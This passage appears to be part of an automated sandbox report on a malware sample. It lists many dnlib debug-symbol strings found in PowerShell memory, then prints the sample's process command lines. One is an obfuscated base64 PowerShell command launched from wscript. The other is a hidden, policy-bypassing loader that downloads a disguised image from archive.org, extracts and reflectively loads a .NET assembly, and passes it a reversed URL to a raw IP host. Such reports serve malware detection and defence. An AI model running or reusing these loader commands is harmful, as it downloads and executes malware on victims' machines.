                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\dnlib-fuscator-master win7 fix\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 